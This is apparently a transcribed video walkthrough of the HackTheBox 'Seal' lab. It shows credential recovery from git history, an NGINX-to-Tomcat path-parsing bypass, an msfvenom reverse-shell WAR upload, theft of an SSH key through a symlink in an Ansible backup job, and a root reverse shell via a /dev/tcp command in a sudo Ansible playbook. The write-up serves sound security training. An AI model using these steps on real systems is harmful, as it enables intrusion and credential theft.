What's going on YouTube? This is Ipsac. I'm doing Seal from HackTheBox, which involves one of my favorite types of vulnerabilities, and that's when there's a big talk about it, but there's never really any patch. The talk in question is from Orange Tsai, the server-side request forgery king, back in Black Hat 2018. It involves a Tomcat server that is running behind a reverse proxy such as NGINX, and the reverse proxy is trying to block the access of management functions of Tomcat, such as accessing /manager/HTML. The server-side request forgery involves putting a payload in the URL that NGINX just reads and doesn't do anything with, but Tomcat will actually remove a portion of that URL, letting you rebuild the URL when it gets to the Tomcat application, therefore bypassing any blacklist. And then once you get a shell on the box, it involves a privesc via Ansible, which I just really liked. So with that being said, let's jump in. As always, we're going to start off with the nmap. So -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it seal, and then the IP address of 10.10.10.250. This can take some time to run, so I've already ran it. Looking at the results, we have a handful of ports open. The first one being SSH on port 22, and its banner tells us it's an Ubuntu server. The next thing we have is HTTPS on port 443. Its banner tells us it's NGINX running on Ubuntu, and typically when I see NGINX in CTFs, I think this is going to be not a PHP application because for some reason PHP is always installed with Apache. If you pretty much Google install PHP Linux, it always talks about the LAMP stack, that's Linux, Apache, MySQL, PHP. So yeah, I'm guessing this is probably like a Python, Node.js, Ruby on Rails, Tomcat, or some other application where NGINX is just a reverse proxy pointing to like a WSGI application if it is a Python thing. So let's just move on. The SSL cert gives us the host name of seal.htb. So let's put this in our host file. Let's do 10.10.10.250 seal.htb. And then moving on, there's not too much interesting. We see the certificate is created on May 2021 and expires May 2022. It's about it. Maybe when like the server was built, but it could be just when the certificate was requested. So you can't really take too much information based upon the SSL. The next thing we have is port 8080, and the nmap is telling us it's just HTTP proxy, but looking at the fingerprint string script, it is definitely a web server because we have a 404 request. I don't even know, it says 404, but this is giving us a 401. So not exactly sure what's going on there. It's giving us a cookie of JSession ID, so chances are port 8080 is Tomcat. And then going down, don't really have anything else. So let's go take a look at the application. Going to 10.10.10.250, we have a SSL warning, so let's just accept it. And then I'm also going to do HTTPS 10.10.10 I meant seal.htb, and see if it has any type of virtual host routing where IP address brings us to a different page. It does not look like that. I'm going to look at the source code real quick to see what is in here, and don't see all that much. I was looking for like any signs this is WordPress or what language it is, but looks like a relatively static page, but it is letting us type things. So I'm going to try searching for broccoli because it asked me for a vegetable. And I put this here. It does a GET request to the page, and the page looks the same. Scrolling down, we have a contact form. We can do pretty much the same thing, and it's just directing us back to this page. So I'm going to quickly fuzz this parameter, and then if there's nothing here, we'll put a dir bust on this page because we always like having recon going, and move on to the next thing. So let's open up Burp Suite. I hit Alt F2 to bring up that menu. That's typically like the Linux way to open up a run prompt on like Windows, they call it the run prompt, like Windows key or Alt F2 on Linux. So let's search something. So search broccoli. We should now be going into Burp Suite. Intercept is on. This is not it. That's maps.google. Try searching this again. What? Drop that. Intercept on. Burp Suite. I did Control R, Shift R to like force a refresh. It was some type of caching thing I think that was happening. But we can get this page. We see 19966. I'm going to do like please subscribe. And we see 19966 still. So chances are this search doesn't really do anything. We can send this over to wfuzz to test it out. So I'm going to do wfuzz-u http 10.10.10.250, do the search, and then fuzz, and then I want to do -w for word list, opt, sec list, fuzzing, special characters. And let's see, we have to do HTTPS. And we have a lot of things that give us a 400 error. I'm going to do like URL encode all these. So wfuzz-e encoders. This will list all the encoders we can use. Probably we want a URL. And encode all characters using the %xx escape. So I'm guessing this is what we want. And how you do encoders with wfuzz is after the word list, you just do comma, and then the encoder you want to use. So it did almost all. We have some characters where the encoder just decided not to encode it for whatever reason, but everything seems to be about the same size. These 400s, I'm not really that interested in them because the bad characters I don't know how to exploit. If they were like a bad character of brackets, I may think SSTI. If it was a quote, I would think it's SQL injection, but question mark, semicolon, I don't know what to do with those. So we'll just ignore that and move on to GoBuster, and then we'll look at port 8080. So GoBuster dir -w for word list, opt, sec list, discovery, web content, raft, small words, .text. And then this page, we don't know exactly what the extension is, so we can't really specify one. -u for URL, HTTPS 10.10.10.250, and I think I need -k because it's going to complain about a SSL error. -k will ignore that. So with GoBuster running, let's go take a look at port 8080. I'm going to take the proxy off. We can go to 10.10.10.250, port 8080. And it looks like the Tomcat application, or maybe JSession ID is not Tomcat. I'm pretty sure it is. Let's do JSession ID, just see what this says. Servlet, J2EE. Let's see, JSession ID. Yeah, I think it's Tomcat. Tomcat app deploy. So, pretty sure this is Tomcat. It is an application called gitbucket. So the first thing I want to do is look at gitbucket default user or default credentials. And we can see both username and password are root. So trying to log in with root gives us an error. I'm looking at the page. I don't see anything that would indicate a version. If I could find a version very quickly, then I'd be going down like the CVE route. Don't see anything. It lets us create an account. So let's do that. IPsec, password is password, IPsec, and we need a mail address. So root at ipsec.rocks. Additional mail address, not applicable. Does that work? Looks like it does. So log in with IPsec and password. And there's a lot of applications scrolling all the way down to see if there was a version info as well. But we have two repositories. We have root seal market and infra. Infra loaded first, so I'm going to take a look at it. We have infra automation. Looking at site.yaml, host Tomcat servers. This is a playbook, so this looks like it is going to be something Ansible related. I'm going to look at the Tomcat. We look at files, init.sh, so I'm guessing this just copies it. And Ansible, we definitely want to look at tasks because this is going to be what it does. So can I make this bigger? I'm just going to go to raw, save. let's just do copy and put this in a terminal prompt. So what was this called? Main.yaml. So let's see, can I do %s 1 2 3 4? There we go. So the name is just the name of the task in Ansible. It can be anything. It's using the yum plugin of Ansible. So this is just doing a yum install and then the Java. The state present says we want it to be installed. If we do state equals absent there, it would remove it. The name, we're adding the group Tomcat. So again, it's just doing group : name equals Tomcat. You could have also done state present there to make sure it adds the group. And if you did again, state equals absent, it would remove the group. So adding user, it's going to create the Tomcat user, put its home directory here, and not create it. Become is going to be like a sudo command, and you can see the become method is sudo. So there's probably other ways you can switch users. So before adding this user, it's going to run sudo. Next, it's going to download Tomcat from this URL, extract it using the command, which command is like os.system. It's going to execute a command. So let's see. It changes the directory before executing the command to user share, and then does that tar extract command to extract it. Symlink the application, change ownership. Again, this is the file plugin of Ansible, so you can just change permissions, things like that. Template, so this is going to install something, and this server.xml is going to be a YAML file, so you could like pass variables in that. So if the server.xml had credentials, you could have the server.xml have the credentials like cred, and then pass this in through an environment variable or something when you copy it. Let's see, create Tomcat users. It doesn't look like there's really anything interesting in this. But that was a quick rundown on how that would work. Let's take a look at the Seal Market app. We have a README that says remove mutual authentication for dashboard, set up registration and login features. And whenever I think mutual authentication, I think of SSL, and that's like SSL mutual authentication. I think I talked about it in like a securing vendor web app thing. So if you want to know more about it, let's see, mutual, yeah, look at this video. But essentially, things that don't have a specific SSL client certificate won't be able to access various pages. So if we go back to our GoBuster, I'm guessing, let's see, let's go to /admin. Let's do seal/admin because that was a 302 or 301. This is just returning a Tomcat error. Let's go to /manager. We're getting a forbidden from NGINX. So NGINX blocked us from doing this. So either it's blocking anything that's not localhost, or it's doing some type of mutual authentication on this page and blocking us, or some other logic. But I go down the fact that NGINX blocked us because that's an NGINX thing. If we go to /admin, we can see this is a Tomcat error. So we know NGINX did not block us. Let's go to the Tomcat config. Catalina, the main thing I like about Tomcat is going into this Tomcat users file and looking for credentials. We don't really have anything, but it does support history, and we can see there are multiple versions of this. I'm going to click on this commit, and we can see what was removed from this, and that is a credential. So I'm going to copy this over to my box. So let's do vcreds.txt. Wrong paste. There we go. And delete words till we get to Tomcat. And then let's see, that was a 4 there. I think it started with 4.2 and ends with Z%. Let's just double check that. 4.2 Z%. Okay, so we copied that correct. Looking at other things, we have app, which is probably going to be the web application itself. I would probably click around here to see if I can find where a config is for it to talk to like a database. but I don't really see anything. Let's take a look at NGINX. And if we do sites available, default, we can see the SSL certificate thing, SSL protocols, and here we go. So location / manager / HTML, it's doing a SSL client verify, which is the mutual authentication. It's doing that on admin dashboard as well. Host manager HTML, and then / it does not do anything. So this next step is a really weird attack that if you know a lot about SSRF, it would probably be pretty natural. So if I do SSRF, Tomcat, NGINX, let's see if it comes up. If not, we'll just go to the Orange Tsai talk. Let's see. Maybe this. I think this is it actually. Breaking parser logic. Yep. From Black Hat 2018. And this Tomcat version, I think, is from like 2020. So it's still somewhat common. I would go watch this talk if you can find it on YouTube. But the key thing we want is when the reverse proxy meets these paths. So what this is going to do is we give it this path. And when Apache, NGINX, and IIS sees it, it sees that path. But when Tomcat sees it, it sees this. And this becomes very important because when NGINX sees, let's see, /manager, then let's do name is equal to orange /admin. So when NGINX sees this path, do we still have it here? It's not going to match. We can do actually admin to test it out real quick. Admin dashboard. So when NGINX sees this, the /admin name equals orange, it's not going to match anything. It's going to match this because there's stuff in between the admin and dashboard. But when Tomcat sees it, it's going to drop this stuff and then just leave /admin /dashboard if this attack works. So let's try this out real quick. So I'm going to go to my browser. We're going to go to skill.htb /admin /dashboard, and we get the 403 forbidden. I'm going to do that weird payload, and we actually get the dashboard. So it is vulnerable to this attack. Now, what's really interesting here is we can do /manager and then HTML, and we get login credentials. So we can try those Tomcat credentials. So I'm going to do Tomcat and paste this password in. And we get access to this Tomcat web manager. So here we can upload a WAR file and pop the application. The other path traversal attack that is interesting in the talk, I like using it more just because I don't fully understand why Tomcat just ignores this, but I like, let's see, this path traversal look more. It's pretty much the same thing. We just do /.. /. So if I do manager /HTML ... HTML or manager, let's do does not exist, and then HTML, it does the same exact thing. So let's do vcreds. That path was this. So there's two ways you can exploit this path traversal. Whatever one you like, you can use. I'm just, for some reason, I like looking at this one more than I like looking at this one. And if one doesn't work, definitely try the other. It's always nice to have options. So with this being having, let's create a malicious WAR file. So for that, I'm going to do MSFVenom -p java JSP shell reverse TCP. And that's something you just learn with experience. When you exploit enough Tomcat instances, you know what MSFVenom payload to use right away. lhost 10.10.14.8, L port 9001, format is going to be a war, and then we'll output it to shell.war. And then for this, we're actually going to want to once we upload this, intercept the request. So HTTP, what is this, seal. So I'll do it without intercepting the request. We'll deploy it, and we get the forbidden because the actual button has us go to manager/HTML. So what we want to do is go to Burp Suite, make sure proxy is clear. When we deploy this, we just want to do that weird attack. So does not exist, semicolon like that. So now we no longer hit that NGINX config blocking this. Forward. And we can see /shell has been deployed. So if I do nclvnp 9001, we can click on shell and we get a connection back. If I do ID, we see Tomcat. So now I'm going to do python 3-c import pty.spawn bin bash. And then control Z stty raw minus echo semicolon fg, hit enter twice. And now we have a good shell. And the export term is equal to xterm, which lets me clear the screen. And the very first thing I'd probably do is run linps, but we could also just run like a program like pspy. So if one of my favorite things is GitHub, pspy, go to Google, and we can see this application. You can just download it from here. I'm just going to do locate pspy64, and you can see I run it quite often. I'm just going to copy it from a box. Let's do player 2, make dir dub, go in here, and then cp the program here, python 3-m http server, and let's go dev shm and wget it. So 10, 10, 14, 8, 8000 pspy64s. So now we are downloading it. chmod plus x. Put too much there. And when we execute it, it will tell us what applications start up. And I generally like just running this once I get a shell, going to get a drink, and then coming back and looking at what applications start up within the first few minutes of running this. Because this will tell you like if cron jobs or things like that are running. And right here, we see bin.sh. It's doing a sleep 30, then doing sudo-u, Luis, user bin Ansible playbook, and it's running this playbook. So what I'm going to do is take a look at it. So if we went into opt backups playbook, we can see run.yaml. I'm going to do this in Vim and hope we have syntax highlighting. Looks a bit prettier. So host, localhost, that means it's going to run on this box, the tasks. It's going to copy files, so it's going to synchronize the directory dashboard to opt backup files, and it's going to use copy links. If you don't know any like Ansible plugin, you can just probably Google Ansible plugin or Ansible module probably. Ansible module, and then the name. Let's take Burp Suite off, and then go to Google and see if we get to the man page of synchronize. So it's a wrapper around rsync. And then we can look at what copy links is. And copy links is going to copy symlinks as items rather than the reference. So if this option is no, then it's just going to copy the shortcut. If this option is yes, anytime you try to copy a symlink, it's not going to copy the shortcut. It's going to go where the symlink points to and copy that file. So with that being said, it's running by Luis, so potentially we can copy his files out of his home directory, specifically his SSH private key. So we have name, server backups, the path, opt backup files, and this is where it copies. And then we also got a clean, state absent, so it's going to delete that. So the first thing I want to do is look at these opt archives. So if I do lsla on this, let's see, there we go. We can see it's been run twice. So we have backup and backup. So it looks like it runs every minute. And what directory was it copying from? It's going to take source out of this. So let's go cd here, find dot dash writable, and we can write to uploads. You can also do writable ls because uploads is chmoded 777. So that's a really handy argument with the find command to find places that you can write. So if we go to uploads, let's try putting a key. So let's see, home, Luis. Let's fix my terminal real quick so it doesn't do that annoying wrap. Open up new pane, stty-a, rows 26, columns 100. So stty, rows 26, cols 100. So now when I do this, line wrapping is fixed. So let's do ln-s to make a symbolic link. I don't know if we need -s or not. If it doesn't work, I'll try it without it. Let's see, home, luis.ssh. I'm going to guess ID RSA. And then we'll make this file name. We'll call it luis.pem. So if I do lsla here, we have, I'm typing that, I did luid, but we have luid.pem pointed to this file. And if I try to view this, I can't. But if we go to that backups directory, so let's do cd opt backups archives, and then let's see, what is the current time? 8:54:24. I'm guessing, well, we can see the file sizes here. So all the file sizes are the same, so there's nothing different about it. Let's do lsla again. 33. This file size is slightly bigger. So let's copy this one backup because that indicates it's different. To dev shm, we can go in there and then gz-d to decompress it. Probably need gzip-d. There we go. If we go into that backup directory now, it's not a directory. See, file. Oh, is this like a weird challenge now of getting into this file because it's got so many bad characters? mv, this weird backup to B. File B. Oh, it's a tar. tar xfb. So now we extracted it. We got the dashboard directory. We got uploads. We got luid.pem. It's owned by us and not a shortcut. It is the whole private key. So now we can SSH into the box as Luis. So I'm going to copy this key. Let's go to a new terminal. V luis.pem. Paste it. chmod 600. And then sh -i, specify the file. Luis at 10.10.10 to 50. Yes. And we get onto the box. I'm going to run sudo-l, and it shows that we can run any Ansible playbook. So what I'm going to do is let's go to opt, backups, playbook, and I'm going to copy run.yaml to my home directory. And let's edit this. So we're executing on localhost. We don't need a copy file. Oh, this isn't doing any commands. Let's see. Delete this, and we don't need archive. I'm going to call this get shell. And then let's go back over to the infra gitbucket because this had a playbook on installing something, and it's just command and then the command we want. So I'm going to try, let's see, how does YAML work? It wants it right where name is. There we go. So we don't need to be changing a directory. And it has been doing absolute paths. So bin bash -c bash -i dev tcp 10.10.14.8 0 and 1 like that. We need the port. Send it to 9001. And let's see what this says. So nc lvmp 9001 sudo -l. We're going to do playbook. So sudo this run.yaml, gathering facts, getting a shell, and we are now root. So I can go into root and we can get root.txt. So that'll be the box. Hope you guys enjoyed it. Take care, and I'll see you all next week.